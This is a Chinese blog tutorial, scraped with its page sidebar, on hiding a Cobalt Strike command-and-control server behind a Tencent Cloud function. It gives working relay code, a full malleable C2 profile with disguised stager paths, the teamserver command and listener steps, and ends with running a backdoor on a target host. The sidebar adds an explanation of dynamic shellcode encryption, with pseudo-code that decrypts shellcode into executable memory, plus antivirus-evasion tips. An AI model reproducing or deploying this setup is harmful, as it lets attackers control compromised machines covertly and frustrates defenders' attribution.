云函数隐匿C2服务器

最新推荐文章于 2024-09-28 22:09:40 发布
最新推荐文章于 2024-09-28 22:09:40 发布
阅读量7.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58687645/article/details/123274357
该博客介绍了如何使用腾讯云函数创建一个与C2(命令与控制)服务器交互的后门。首先,通过自定义创建云函数并编写Python代码,配置HTTP请求以GET或POST方式与C2服务器通信。接着,设置API网关触发器,确保函数被正确调用。在服务器端,创建p.profile文件并填充配置,以执行不同的HTTP操作。最后,配置API监听器以生成后门程序,并在靶机上运行上线。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

第一步,创建云函数

登录腾讯云平台,访问云函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中:

# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
    C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标(如果使用443将http改为https即可)
    path=event['path']
    headers=event['headers']
    print(event)
    if event['httpMethod'] == 'GET' :
        resp=requests.get(C2+path,headers=headers,verify=False) 
    else:
        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
        print(resp.headers)
        print(resp.content)
    
    response={
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": str(base64.b64encode(resp.content))[2:-1]
    }
    return response

C2的值填写c2服务器地址就可以了,后面也不再需要增加:80:443,点击完成后,云端会部署函数。

创建完成。

选择第二个功能:触发管理,创建触发器。触发版本选择$LATEST,触发版本选择API网关触发,其余的就不需要动了,点击提交

触发器创建完成,点击API服务名,进入到管理API页面,在刚新建的API上,点击编辑。在编辑API页面中,将路径改为/,点击立即完成-发布服务即可。

二、 服务器端新增 p.profile文件 (放在cs跟目录下);将一下代码复制进去;

set sample_name "kris_abao";

set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/getit";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/postit";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

运行cs : ./teamserver ip 密码 p.profile

三、设置监听器

管理API页面中,点击我们刚创建的APIid,进入到api的基本信息页面,我们要使用的是默认访问地址,用在cobalt strike创建监听器时使用。创建监听器时,我选择的是https,然后在HTTP HostsHTTP Host(stager)填入之前复制的地址。(这里是否选择http协议,根据你函数里的类型来选择)

 

 

监听器创建完成后,生成后门程序,在靶机运行既可上线。

安全菜
关注
某云云函数隐藏C2
问题很多的小明
05-09 942
云函数内容: 向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw 部署后测试,访问API网关,真实服务器监听对应端口,查看数据包: 服务端配置 获取真实ip的必要配置,参考https://mp.weixin.qq.com/s/lL3UKCRW0cN4SgQIZl7vYw set sample_name "t"; set sleeptime "3000"; set ji
云函数隐藏c2服务器
weixin_44747030的博客
01-15 9057
学习记录
云函数实现隐藏c2地址
milu_Sec的博客
12-30 959
说明:云函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个云函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即云函数地址)就可以运行了。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon。该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。
使用腾讯云函数隐藏C2
2201_75387456的博客
05-23 1210
腾讯云云函数(Serverless Cloud Function,SCF),可以为企业和开发者提供无服务器执行环境,无需购买和管理服务器,只要在腾讯云上使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。所有的流量都是通过腾讯云函数进行转发,因此溯源后门只能得到腾讯云的域名和IP,且云函数服务器是自带 CDN 的,能够很好的隐藏我们的C2服务器。发布成功,到这里我们的云函数和触发器就配置成功了。域前置,走cdn域名,利用云函数。保存,生成后门进行测试。
C2使用云函数进行隐藏和加速
sweelg的博客
09-18 455
C2使用云函数进行隐藏和加速利用云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的);C2客户端发出的流量经过 云函数的转发,到达我们的C2服务器,达到隐藏的效果https://mp.weixin.qq.com/s/gfBE-HaUCgQw8L0QByqTDA ...
利用腾讯云函数隐藏C2服务器
xiaokp7的博客
06-17 862
隐藏c2服务器
僵尸网络追踪:C2服务器隐匿技术破解.pdf
最新发布
04-27
文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 在万物互联的时代,信息安全已成为数字化进程中的关键基石。从金融交易到医疗...
Serverless扫描技术研究及应用
技术超强的网络安全平台
05-04 399
转载于:https://xz.aliyun.com/t/10612 前记 ​ 大家好,我是风起,本次给大家分享的是 Serverless扫描技术 也是我在SecTime沙龙演讲时讲到的一种隐匿扫描技术,通过 Serverless(云函数) 实现各种扫描器探测功能,以达到绕过态势感知、WAF等安全设备,增大蓝队研判人员溯源难度,实现封无可封,查无可查的效果。希望大家通过阅读本文能够有所收获,那么下面由我来给大家揭秘这个有趣的攻击方式吧。 Serverless目录扫描实现
网络安全专业名词解释
aixmmmlll的博客
05-16 4487
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
基于威胁情报周期模型的APT木马剖析
Tencent_SRC的博客
02-08 907
文|腾讯安全平台部xti9er前言近日,腾讯服务器安全系统“洋葱”协助部署于公有云的某合作方捕获到一起APT事件,目前已处置完毕。处置过程中捕获木马样本一枚,该样本中包含了大量隐匿攻击手法...
基于baidu的云函数实现隐藏c2真实地址
dreamer292的博客
09-28 1102
baidu云函数的隐藏c2地址方式
云函数隐藏C2技术的防御反制思路
include_voidmain的博客
08-30 2124
云函数隐藏C2技术的防御反制思路
使用云函数来隐藏webshell的真实IP
weixin_61638307的博客
04-10 696
在平时的学习工作中,大家有没有遇到一穿webshell就被ban掉IP呢,今天本文就决定分享一个使用云函数来隐藏自己的真实IP的案例,也可以利用云函数的多出口性为了防止被红队溯源。
基于CDN实现隐藏c2真实地址
dreamer292的博客
09-26 1413
通过cdn的配置实现隐藏c2的真实地址。
隐藏C2服务器IP的各种方法总结
sweelg的博客
09-18 1136
利用CDN、域前置、重定向三种技术隐藏C2的区别_Shanfenglan's blog-CSDN博客_域前置 前言 这个课题前段时间已经分别做过研究,但没有写三者的区别分析,以为自己可以将三种技术永远记在心里,但是事实是确实淡忘一部分知识点,导致现在对三者的理解出现偏差。 反思:以后倘若需要做技术记录,一定要详细详细再详细,有备无患。不能抱有侥幸心理,因为你永远不知道,问题与遗忘哪一个会先来 对于三种隐藏技术的理解 CDN技术隐藏C2 反溯源-cs和msf域名上线 利用CDN隐藏C2地址 使用CDN
什么是C2 服务器(Command and Control Server)
m0_57836225的博客
08-15 1454
5. **域前置技术**:滥用云内容传递网络的功能来掩盖攻击者的真实地址、命令和控制来源以及数据泄露的去向。4. **远程控制攻击**:C2 服务器使攻击者能完全掌控受感染设备,可在未经合法用户同意或知晓的情况下执行恶意操作,如安装恶意软件、更改系统设置、窃取敏感信息,甚至非法监视或破坏关键基础设施。6. **利用硬件缺陷**:某些现代 IT 系统中的基板管理控制器(BMC)存在能被攻击者利用的漏洞,攻击者可借此监视和管理固件及硬件设施,执行修改系统设置、重新安装系统或更新驱动等操作。
【红队APT】反朔源隐藏&C2项目&CDN域前置&云函数&数据中转&DNS转发
今天是几号的博客
04-19 4535
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实的C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
HW红队攻防基础建设—C2 IP隐匿技术
撸起袖子加油干
04-16 2383
前记 随着HW的开始,蓝队弟弟们见识到了很多奇特的操作,本文主要从监测溯源时比较常见的一些红队的隐匿手法进行讲解。在实际攻防中有效的隐匿我们的C2主机也是很必要的,在工作的同时发现很多蓝队对此并不熟悉,所以本文会深入浅出的讲解三种常见的方式,希望通过本文能够对各位有所帮助。 域前置 域前置技术就是通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。这里作者利用阿里云全站加速CDN实现任意HOST头修改,利用构造高信誉域名,从而实现绕过流量...
动态加密shellcode
02-18
<think>好的,用户想了解动态加密Shellcode,我需要先回忆一下相关知识,确保自己理解正确。动态加密Shellcode主要用在恶意软件或渗透测试中,用来绕过杀毒软件的检测。Shellcode本身是一段执行特定操作的机器码,比如反向连接或者下载文件。如果直接使用静态的Shellcode,特征明显,容易被AV/EDR识别。 动态加密应该是指在运行时动态解密Shellcode,这样静态分析时就看不到明文的恶意代码。可能涉及到分块加密、密钥动态生成或者使用环境变量作为密钥等方法。另外,可能还要考虑如何隐藏解密过程,避免行为检测。 用户可能需要了解动态加密的基本原理、实现方式以及它的优势。比如分阶段加载,每次只解密一部分,减少内存中的暴露。或者使用AES、XOR等加密算法,但密钥不是硬编码的,而是运行时获取的,比如从服务器下发,或者通过某种算法生成,这样每次加密的Shellcode都不同,避免特征匹配。 另外,可能还要提到一些高级技术,比如基于时间的密钥,或者利用合法API进行解密,减少可疑行为。还要注意内存保护属性,比如在解密后修改内存为可执行,可能需要调用VirtualProtect或者mprotect。 不过用户可能是安全研究人员或者红队成员,需要实际应用,所以可能需要举例子,比如用C/C++实现XOR加密,然后在运行时解密并执行。或者提到工具如Metasploit的加密功能,Cobalt Strike的Sleep Mask等。 需要提醒的是,动态加密虽然能绕过静态检测,但行为分析还是可能被发现,比如调用敏感API,内存分配等。因此可能需要结合其他技术如混淆、反调试等。 现在组织一下语言,分点解释动态加密Shellcode的概念、原理、常见方法、优缺点以及可能的示例。确保用中文口语化,不用专业术语太过密集,让用户容易理解。同时注意不要提供完整的攻击代码,避免被滥用,只做技术原理介绍。动态</think>加密 Shellcode 是一种常用于绕过安全检测的技术,主要用于渗透测试或恶意软件中。其核心思路是**在运行时动态解密并执行恶意代码**,从而避免静态特征被安全软件识别。以下是关键点解析: --- ### **1. 基本原理** - **静态加密**:Shellcode(一段机器码,如反弹连接的指令)在存储或传输时是加密的,避免直接暴露特征。 - **动态解密**:程序运行时,通过特定算法(如 XOR、AES)实时解密 Shellcode,再将其注入内存执行。 - **内存隐匿**:解密后的 Shellcode 仅在内存中存在,硬盘上无明文痕迹,增加检测难度。 --- ### **2. 常见实现方式** - **分块加密**:将 Shellcode 分割成多个块,每次解密一小段,减少内存中完整暴露的风险。 - **动态密钥**:密钥不硬编码,而是运行时生成(如通过系统时间、环境变量),每次加密结果不同。 - **API 合法调用**:利用系统 API(如 `CryptDecrypt`)解密,伪装成正常行为。 - **自修改代码(SMC)**:程序自身包含解密逻辑,运行时会修改自己的代码段来解密 Shellcode。 --- ### **3. 技术优势** - **绕过静态扫描**:加密后的 Shellcode 无固定特征,避免基于签名的检测。 - **灵活对抗分析**:可结合环境变量(如用户 ID、MAC 地址)生成密钥,仅在特定目标环境才能解密。 - **减少内存特征**:通过分阶段解密或及时擦除内存,降低行为监控的捕获概率。 --- ### **4. 典型示例(概念性伪代码)** ```c // 加密的 Shellcode(例如 XOR 加密) unsigned char encrypted_shellcode[] = {0xA1, 0xB2, 0xC3, ...}; // 动态获取密钥(例如通过简单运算) char key = get_current_hour(); // 根据当前小时数生成密钥 // 解密函数 void decrypt(char *data, int len, char key) { for(int i=0; i<len; i++) { data[i] ^= key; // XOR 解密 } } int main() { // 解密 Shellcode decrypt(encrypted_shellcode, sizeof(encrypted_shellcode), key); // 将解密后的 Shellcode 写入可执行内存并执行 void (*exec)() = (void(*)()) VirtualAlloc(NULL, sizeof(encrypted_shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, encrypted_shellcode, sizeof(encrypted_shellcode)); exec(); return 0; } ``` --- ### **5. 对抗与检测** - **行为监控**:检测异常内存操作(如同时申请可写+可执行的内存)。 - **熵值分析**:高熵值的加密数据可能被标记为可疑。 - **沙箱诱捕**:在虚拟环境中运行时,密钥生成逻辑可能失效,导致 Shellcode 无法正确解密。 --- ### **6. 实际应用工具** - **Cobalt Strike**:通过 "Sleep Mask" 功能在睡眠期间加密内存中的 Shellcode。 - **Metasploit**:支持生成加密的 Payload(如 `msfvenom` 使用 `--encrypt` 参数)。 - **自定义 Loader**:攻击者常编写专用加载器,实现多层解密或与 C2 服务器交互获取密钥。 --- ### **总结** 动态加密 Shellcode 通过**运行时解密**和**内存隐身**技术提升了隐蔽性,但并非万能。现代安全系统会结合行为分析、内存扫描等手段进行对抗,因此实际应用中常需与其他技术(如反调试、API 混淆)结合使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值